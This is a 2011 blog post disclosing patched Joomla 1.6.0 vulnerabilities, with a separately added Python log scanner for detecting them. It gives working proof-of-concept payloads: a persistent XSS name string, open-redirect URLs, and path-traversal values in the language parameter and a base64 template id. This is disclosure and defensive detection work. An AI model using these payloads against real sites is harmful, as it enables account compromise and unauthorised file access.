Tuesday, 08 March 2011 10:47

Now that 1.6.1 is officially released, I figured I'd go ahead and publish a few of the "sensitive" bugs I found in 1.6.0.

So without further ado...

Persistent XSS

http://developer.joomla.org/security/news/331-20110204-core-xss-vulnerabilities
  1. Log in as any user
  2. Edit profile
  3. Change name:
y"/style="position:absolute;top:0px;left:0px;width:99em;height:99em"/onmouseover="alert(1);//
  4. Save profile
  5. Wait for admin to visit administrator/index.php?option=com_users

Redirect

http://developer.joomla.org/security/news/333-20110302-core-redirect-vulnerabilities

The following URLs caused off-site redirects.

index.php?option=com_content&view=article&task=vote&id=-1&user_rating=999&url=http%3A%2f%2fjeffchannell.com

index.php?option=com_weblinks&task=weblink.add&return=aHR0cDovL2plZmZjaGFubmVsbC5jb20=

Information Disclosure

http://developer.joomla.org/security/news/334-20110303-core-information-disclosure

The following URL could be used to see articles regardless of user access level:

index.php?option=com_content&view=articles&layout=modal&tmpl=component

Information Disclosure

http://developer.joomla.org/security/news/332-20110301-core-information-disclosure

Saving of user profiles did not properly sanitize the 'language' parameter.

  1. Log in as any user
  2. Visit index.php?option=com_users&view=profile
  3. Click "Edit Profile"
  4. Turn on Tamper Data
  5. Submit form
  6. Edit jform[params][language] and set to ../index.php%00
  7. Submit data
* Failed loading XML file
* /var/www/jj/language/../index.php
* XML: ParsePI: PI php never end ...
* XML: Start tag expected, '<' not found

Unauthorized Access

http://developer.joomla.org/security/news/335-20110304-core-unauthorised-access

The following URL will allow authenticated users with permission to access the Template Manager to edit files outside the scope of the template:

administrator/index.php?option=com_templates&task=source.edit&id=NTAzOi4uLy4uL2luZGV4LnBocA==
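From the defender's side, the redirect, language-parameter and Template Manager issues above all leave a recognisable shape in request logs. The following Python is an added example of mine (not code from the original post or from the Joomla project) that flags those shapes in combined-format access logs; SITE_HOST, the sample log lines and the label names are constructed assumptions.

```python
import base64, binascii, re
from urllib.parse import parse_qs, urlsplit

SITE_HOST = "www.example.org"  # constructed: host this Joomla site is served from

def _b64(value):
    # lenient base64 decode; anything undecodable becomes ''
    try:
        return base64.b64decode(value + "=" * (-len(value) % 4)).decode("latin-1")
    except (binascii.Error, ValueError):
        return ""

def _offsite(url):
    # True when url is absolute and names a host other than SITE_HOST
    try:
        host = urlsplit(url).hostname
    except ValueError:
        return True  # unparseable target: treat as suspicious
    return host is not None and host.lower() != SITE_HOST

def classify_query(query):
    # labels for the 1.6.0 request patterns present in one URL-encoded query string
    q = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    found = []
    if q.get("option") == "com_content" and q.get("task") == "vote" and _offsite(q.get("url", "")):
        found.append("redirect:url")      # vote handler followed a plain off-site 'url'
    if "return" in q and _offsite(_b64(q["return"])):
        found.append("redirect:return")   # 'return' is base64; decode before checking the host
    lang = q.get("jform[params][language]", "")  # a POST field: needs a log that records form data
    if any(bad in lang for bad in ("..", "/", "\\", "\x00")):
        found.append("path:language")     # traversal or NUL byte in the language field
    if q.get("option") == "com_templates" and q.get("task") == "source.edit" and ".." in _b64(q.get("id", "")):
        found.append("path:template-id")  # 'id' is base64 "<id>:<path>" hiding traversal
    return found

REQ = re.compile(r'"(?:GET|POST) [^"? ]*\??([^" ]*) HTTP/')
def scan_log(lines):
    # (line, labels) for each combined-format access-log line matching a pattern
    hits = []
    for line in lines:
        m = REQ.search(line)
        labels = classify_query(m.group(1)) if m else []
        hits += [(line, labels)] if labels else []
    return hits

SAMPLE_LOG = """\
203.0.113.5 - - [08/Mar/2011:10:47:00 +0000] "GET /index.php?option=com_content&view=article&task=vote&id=-1&user_rating=999&url=http%3A%2f%2fjeffchannell.com HTTP/1.1" 303 0
203.0.113.5 - - [08/Mar/2011:10:48:00 +0000] "GET /index.php?option=com_weblinks&task=weblink.add&return=aHR0cDovL2plZmZjaGFubmVsbC5jb20= HTTP/1.1" 303 0
203.0.113.5 - - [08/Mar/2011:10:50:00 +0000] "GET /administrator/index.php?option=com_templates&task=source.edit&id=NTAzOi4uLy4uL2luZGV4LnBocA== HTTP/1.1" 200 4096
"""  # constructed sample log: three of the request shapes described above
```

Access logs do not carry POST bodies, so the language-parameter rule only fires when a WAF or request log writes form fields into the logged URI.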
Last Updated on Tuesday, 08 March 2011 11:21
 
Comments (1)
1 Monday, 08 August 2011 21:25
minixssx
Wonderful work!!

so brilliant you are


The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
